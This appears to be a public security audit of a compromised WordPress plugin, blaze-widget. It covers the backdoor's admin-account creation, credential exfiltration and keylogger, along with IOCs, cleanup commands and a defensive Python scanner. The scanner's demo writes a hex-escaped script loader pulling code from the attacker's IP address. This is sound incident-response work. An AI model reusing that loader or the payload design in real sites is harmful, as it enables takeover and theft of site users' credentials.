
Audit #19 Cleaned

BLAZE Retail Widget Closed on WP.org · — installs · baseline trunk@r2268077 → head trunk@r3106494 · suspect committer blazeretail · by beacon-scan-skill (backfill from Wordfence 2024-06-24 advisory) · closed 1y ago

Actor: June 2024 wp.org credential-stuffing wave (operator unattributed)

Confirmed malicious supply-chain compromise: 30 commits in a single burst. Between 2024-06-21 23:21 UTC and 2024-06-24 03:50 UTC (about 52 hours) the legitimate blazeretail SVN account was used to push 30 commits, all with the message "Upgrade", into the blaze-widget trunk, after a 4-year dormant period (the last prior commit was 2020-03-26).

The wp.org Plugin Review Team (frantorres) reverted the changes at r3106791 + r3106796 on 2024-06-24 and closed the plugin the same day with reason security-issue. Tags 2.5.3 and 2.5.4 visible in SVN today are PRT-authored cleanup tags (NOT malicious): they contain a public incident notice plus an init-action handler that auto-invalidates the password of any backdoor admin account it finds (PluginAUTH, PluginGuest, Options).

Payload is the canonical June 2024 backdoor. PHP side: an admin_init handler that walks parent directories for wp-config.php, opens a direct mysqli connection, inserts an admin user PluginAUTH (email <username>@example.com, 13-character password), POSTs the credentials as JSON to https://94.156.79.8/AddSites, and then performs cross-CMS recon (PrestaShop / Drupal / Symfony detection), reporting hits to /CMSUsers. JS side: a keylogger injected via add_footer_script, a hex-escaped eval(" ...") that loads https://94.156.79.8/sc-top.js and POSTs every keystroke to https://hostpdf.co/pinche.php with cookie xcnmo-offsetgxc.

Identical payload to social-warfare 4.4.7.1 (audit #14), including the distinctive pachamama() and zbvalidate_file() function names.

Cleanup published: trunk reverted, PRT cleanup tags in SVN, plugin still closed on wp.org

The malicious trunk commits have been reverted and the PRT-authored cleanup tags (2.5.3, 2.5.4) are published, but the plugin itself remains closed on wp.org. This audit is retained as a public record of the incident and the IOCs.

If you run blaze-widget on your site

Verify that the files on disk match the checksums wp.org has on record for the installed version (WP-CLI checksum command):

wp plugin verify-checksums blaze-widget

A checksum match only tells you the files equal a wp.org-published build for that version string; it does not inspect what the build does. Also grep the plugin directory for the code_pattern IOCs listed below and check wp_users for the backdoor accounts named in the summary (PluginAUTH, PluginGuest, Options). Because the plugin is closed on wp.org, do not wait for an author-supplied patched release: remove the plugin unless you have a specific reason to keep it.

Or remove the plugin entirely:

wp plugin deactivate blaze-widget
wp plugin delete blaze-widget

If you're the plugin author

Cleanup steps to clear this label were not separately documented for this audit; the PRT revert and cleanup tags described above were accepted as the remediation. Contact the investigator listed above with questions.

✓ Cleanup confirmed and audit closed.

Plugins under the same committer's SVN access

blazeretail holds push access to 2 plugins totalling — active installs. Each non-target plugin scans clean today but represents a one-commit hijack opportunity.

BLAZE Retail Widget — patched / closed audit
BLAZE Retail WooCommerce — closed by wp.org

IOCs extracted (8)

Kind              Value                          Confidence
changelog_phrase  Upgrade                        low
code_pattern      eval("                         medium
code_pattern      get_woocommerce_user_count     high
code_pattern      getWPUsers                     high
code_pattern      passwordz                      high
code_pattern      PluginGuest                    high
code_pattern      PRT_incidence_response_230624  medium
code_pattern      zbvalidate_file                high

Note: judging by its name, PRT_incidence_response_230624 belongs to the PRT cleanup handler described in the summary rather than to the attacker's payload, so a hit on it indicates the cleanup tag is present, not that the backdoor is. The network indicators in the summary (94.156.79.8, hostpdf.co/pinche.php, cookie xcnmo-offsetgxc) are not in this table but are equally usable for detection.
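The sweep a site owner would run after the "If you run blaze-widget" steps above, written out as an added example (not code from the audit tooling, from wp.org or from the plugin): it scans a plugin directory for the code_pattern IOCs in this table, decodes hex-escaped eval("...") strings so the loader URL they hide can be read in clear, and checks user records for the backdoor-account signature the summary gives (logins PluginAUTH, PluginGuest, Options; e-mail <login>@example.com). The plugin files and user rows it creates are constructed for the demo, not taken from SVN.

```python
"""Offline IOC sweep for the blaze-widget backdoor (added example, not audit code).

Scans a plugin tree for the code_pattern IOCs, decodes hex-escaped eval()
strings, and flags backdoor-style admin accounts. Sample data is constructed.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# code_pattern IOCs from the table, with the confidence listed there.
CODE_IOCS = {
    "get_woocommerce_user_count": "high",
    "getWPUsers": "high",
    "passwordz": "high",
    "PluginGuest": "high",
    "zbvalidate_file": "high",
    "PRT_incidence_response_230624": "medium",  # by its name, the PRT cleanup handler
    'eval("': "medium",
}
BACKDOOR_LOGINS = {"PluginAUTH", "PluginGuest", "Options"}

# A double-quoted string made entirely of \xNN escapes, passed to eval().
HEX_EVAL = re.compile(r'eval\("((?:\\x[0-9a-fA-F]{2})+)"\)')


def decode_hex_escapes(escaped: str) -> str:
    """Turn literal backslash-x escape text (e.g. \\x68\\x74\\x74\\x70) into "http"."""
    return bytes.fromhex(escaped.replace("\\x", "")).decode("latin-1")


def scan_file(path: Path) -> list[dict]:
    """One hit per IOC occurrence; hex-escaped evals also carry the decoded text."""
    hits = []
    for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
        for pattern, confidence in CODE_IOCS.items():
            if pattern in line:
                hits.append({"file": path.name, "line": lineno,
                             "ioc": pattern, "confidence": confidence})
        for m in HEX_EVAL.finditer(line):
            hits.append({"file": path.name, "line": lineno, "ioc": "hex_escaped_eval",
                         "confidence": "high", "decoded": decode_hex_escapes(m.group(1))})
    return hits


def scan_plugin_dir(root: Path) -> list[dict]:
    """Scan every .php and .js file under root."""
    return [h for p in sorted(root.rglob("*")) if p.suffix in (".php", ".js")
            for h in scan_file(p)]


def suspicious_users(users: list[dict]) -> list[dict]:
    """Flag the known backdoor logins, plus any administrator whose e-mail is
    <login>@example.com, the pattern the payload uses for the account it creates.
    Accepts rows shaped like `wp user list --format=json` (roles as list or CSV string)."""
    flagged = []
    for u in users:
        login, email = u["user_login"], u["user_email"]
        roles = u.get("roles", [])
        if isinstance(roles, str):
            roles = [r.strip() for r in roles.split(",")]
        is_admin = "administrator" in roles
        if login in BACKDOOR_LOGINS or (is_admin and email == f"{login}@example.com"):
            flagged.append(u)
    return flagged


def hex_escape(s: str) -> str:
    """Encode s as \\xNN escapes, the way the injected footer script is obfuscated."""
    return "".join(f"\\x{b:02x}" for b in s.encode())


def build_sample_plugin(root: Path) -> None:
    """Write a constructed plugin tree carrying the markers (demo input only)."""
    loader = ('var s=document.createElement("script");'
              's.src="https://94.156.79.8/sc-top.js";document.head.appendChild(s);')
    php = [
        "<?php",
        "function zbvalidate_file($f) { return file_exists($f); }",
        "function add_footer_script() {",
        "  echo '<script>eval(\"" + hex_escape(loader) + "\")</script>';",
        "}",
        "$passwordz = wp_generate_password(13);",
    ]
    (root / "blaze-widget.php").write_text("\n".join(php) + "\n")


SAMPLE_USERS = [  # constructed rows, not from any real site
    {"user_login": "shopowner", "user_email": "owner@shop.example", "roles": ["administrator"]},
    {"user_login": "PluginAUTH", "user_email": "PluginAUTH@example.com", "roles": "administrator"},
    {"user_login": "editor1", "user_email": "ed@shop.example", "roles": ["editor"]},
]


def run_demo() -> dict:
    """Build the sample tree in a temp dir, scan it, and check the sample users."""
    root = Path(tempfile.mkdtemp(prefix="blaze-widget-demo-"))
    build_sample_plugin(root)
    return {"hits": scan_plugin_dir(root), "users": suspicious_users(SAMPLE_USERS)}


if __name__ == "__main__":
    result = run_demo()
    for h in result["hits"]:
        print(h)
    for u in result["users"]:
        print("suspicious account:", u["user_login"])
```

Against a real site, point scan_plugin_dir at wp-content/plugins/blaze-widget and feed the output of `wp user list --fields=user_login,user_email,roles --format=json` into suspicious_users. A decoded hex_escaped_eval hit is worth reading in full: it is where the sc-top.js loader and the keystroke exfiltration target appear in clear.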